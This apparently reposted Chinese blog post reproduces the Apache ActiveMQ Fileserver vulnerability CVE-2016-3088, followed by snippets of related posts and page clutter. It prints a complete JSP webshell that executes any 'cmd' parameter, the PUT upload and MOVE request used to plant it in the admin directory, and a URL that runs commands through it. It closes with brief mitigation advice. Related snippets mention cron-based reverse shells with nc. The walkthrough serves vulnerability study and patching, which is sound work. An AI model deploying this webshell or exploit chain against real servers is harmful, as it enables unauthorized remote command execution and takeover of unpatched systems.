Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)案例分析

最新推荐文章于 2024-10-01 00:04:58 发布
最新推荐文章于 2024-10-01 00:04:58 发布
阅读量391 收藏
点赞数
原文链接:http://www.cnblogs.com/qmfsun/p/7504875.html
版权

部署ActiveMQ运行环境

在linux上部署apache-activemq-5.10.0-bin.tar.gz

通过tar -zxvf  apache-activemq-5.10.0-bin.tar.gz解压mq

 

由于是弱密码,所以可以直接密码登录admin/admin

注意:

如果是密码错误或者不输入密码,则显示如下

 

 

输入正确的密码后,通过BurpSuite抓包如下

抓包如下:

改成PUT方法:

此时,htxk.jsp内容为空

重新生成htxk.jsp,文件内容为jsp一句话木马

<%@ page import="java.io.*"%>
<%
    out.print("Hello</br>");
    String strcmd = request.getParameter("cmd");
    String line =null;
    Process p=Runtime.getRuntime().exec(strcmd);
     InputStream is = p.getInputStream();
      BufferedReader br = new BufferedReader(new InputStreamReader(is));
    while((line =br.readLine())!=null){
        out.print(line+"<br>");
    }
%>

 

查看是否可以执行

可惜没有权限执行

爆出mq的绝对路径

然后利用 MOVE 方法将 Webshell 移入 admin/ 目录(也可以利用相对路径)

MOVE /fileserver/htxk.jsp HTTP/1.1
Destination: file:///home/local/apache-activemq-5.10.0/webapps/admin/htxk.jsp
Host: 192.168.10.106:8161

访问http://192.168.10.106:8161/admin/htxk.jsp?cmd=ls ,命令成功执行,效果如下

解决方法:

5. 漏洞防护方案

1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。

2、通过移除 conf\jetty.xml 的以下配置来禁用 ActiveMQ Fileserver 功能

修复成功

 

存在漏洞的配置:

 

 

https://paper.seebug.org/346/

https://www.seebug.org/vuldb/ssvid-96268

 

转载于:https://www.cnblogs.com/qmfsun/p/7504875.html

weixin_30432179
关注
CVE-2020-11998 —— Apache ActiveMQ 远程代码执行漏洞
战神/calmness的博客
12-10 1308
目录 Apache ActiveMQ 组件介绍 描述 影响版本 过程 修复建议 CVE-2020-11998 | Apache ActiveMQ 远程代码执行漏洞 Apache ActiveMQ 组件介绍 Apache ActiveMQApache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 描述 9月10日Apache软件基金会发布安全公告,修复了Apache Active.
activemq 远程代码执行CVE-2016-3088
qq_32445755的博客
03-31 579
简介 ActiveMQApache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了 jetty。Apache ActiveMQ Fileserver 存在多个安全漏洞,可使远程攻击者用恶意代码替代 Web 应用,在受影响系统上执行远程代码,请拿到 flag,默认在/tmp/目录中。提示:该漏洞一句话木马无法执行,请利用命令执行
Apache ActiveMQ 远程代码执行漏洞复现(CNVD-2023-69477)
huangyongkang666的博客
10-31 7336
上周爆出来的activeMQ远程代码执行漏洞,正好做一下漏洞复现,记录一下。
Apache ActiveMQ Web控制台默认/无凭据(原理扫描) 漏洞处理
最新发布
zengliguang的专栏
10-01 502
代码Apache ActiveMQ Web控制台默认/无凭据(原理扫描) 漏洞处理。
Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)分析
07-16 440
1.漏洞背景:ActiveMQApache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 ActiveMQWeb 应用。 2016年4月14日,国外安全研究人员 Simon Zu...
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088)复现
m0_69994768的博客
01-23 1218
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088
Apache ActiveMQ Fileserver远程代码执行漏洞
08-25 166
  扫端口的时候遇到8161端口,输入admin/admin,成功登陆,之前就看到过相关文章,PUT了一句话上去,但是没有什么效果,于是本地搭建了一个环境,记录一下测试过程。 环境搭建: ActiveMQ 5.1.0 下载地址:http://activemq.apache.org/activemq-510-release.html 解压后,双击运行abtivemq.bat运行。(进...
Apache ActiveMQ 远程代码执行漏洞分析
蚁景网安学院
01-09 1290
Apache ActiveMQ官方发布新版本,修复了一个远程代码执行漏洞,攻击者可构造恶意请求通过Apache ActiveMQ的61616端口发送恶意数据导致远程代码执行,从而完全控制Apache ActiveMQ服务器。
漏洞复现】ActiveMQ文件上传漏洞(CVE-2016-3088)
晚风不及你
01-05 662
Apache ActiveMQApache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。
Apache ActiveMQ RCE漏洞复现(CVE-2023-46604)
0xSec
10-26 8557
ActiveMQ是一个开源的消息代理和集成模式服务器,它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序或系统之间进行通信。Apache ActiveMQ 中存在远程代码执行漏洞Apache ActiveMQ默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行
activemq 命令执行漏洞cve-2015-5254)
QuanPangShu的博客
06-14 305
activemq 命令执行漏洞cve-2015-5254)
ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)复现实验报告
weixin_48400575的博客
01-23 3141
ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)复现实验报告
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088)复现及排查
dayouzi的博客
08-14 2452
ActiveMQweb控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。
Apache ActiveMQ 远程代码执行漏洞复现(CVE-2023-46604)】
一纸荒芜的博客
04-26 4001
近期在漏洞扫描时发现服务器存在CVE-2023-46604漏洞,故做一下漏洞复现记录。
vulhub学习(2) Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)复现
yukinorong的博客
06-24 3230
漏洞环境 配置vulhub , 在目录activemq/CVE-2016-3088中打开docker。 docker中显示 此时开启了两个端口分别为8161和61616 其中61616是工作端口,消息在这个端口进行传递; 8161是网络管理页面端口 访问http://your-ip:8161即可看到网络管理页面,不过这个漏洞理论上是不需要网络的。 利用浏览器进入网络管理页面 进入admin界面,默认密码账号为admin 漏洞原理 ActiveMQ Web控制台分为三个应用程序:admin,api和f
Apache ActiveMQ jolokia 远程代码执行漏洞
时光不老的博客
11-29 2267
漏洞存在于Jolokia服务的请求处理方式中,结合ActiveMQ的配置不当和Java的高级功能,允许已认证的用户通过发送特定格式的HTTP请求来执行危险操作。ActiveMQ的内部配置允许org.jolokia.http.AgentServlet处理来自/api/jolokia的请求,而没有足够的安全检查来防止恶意操作。
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
weixin_44047654的博客
11-25 3089
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
CVE-2016-3088
龙卷风摧毁停车场
02-24 344
2016年4月14日,国外安全研究人员 Simon Zuckerbraun 曝光 Apache ActiveMQ Fileserver 存在多个安全漏洞,可使远程攻击者用恶意代码替代Web应用,在受影响系统上执行远程代码CVE-2016-3088)。
cve-2016-3088
07-27
CVE-2016-3088是指Apache ActiveMQ中的一个安全漏洞。该漏洞允许攻击者通过特制的HTTP请求在目标服务器上执行任意命令。\[1\]为了利用这个漏洞,攻击者需要上传一个包含恶意代码的文件,并将其移动到能够执行JSP文件的文件夹中。然后,攻击者可以通过访问目标文件来执行命令并获取返回的数据。\[3\]为了实现计划任务反弹,攻击者还可以将文件移动到/etc/cron.d目录下,并使用nc命令监听指定端口等待回显。\[3\] 修复这个漏洞的方法是升级Apache ActiveMQ到5.14或更高版本。5.14及以后的版本取消了fileserver应用,从而消除了这个漏洞的风险。\[3\]如果升级会对目前业务持续性产生影响,可以通过改写配置文件来解决问题。具体来说,可以修改ActiveMQ根目录下conf目录中的jetty.xml文件,将fileserver相关行进行注释操作。\[3\]更多关于该漏洞的信息可以参考Apache ActiveMQ的安全公告。\[3\] #### 引用[.reference_title] - *1* *2* [ActiveMQ远程代码执行漏洞(CVE-2016-3088)](https://blog.csdn.net/weixin_44047654/article/details/128033455)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CVE-2016-3088](https://blog.csdn.net/weixin_52084568/article/details/129194108)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值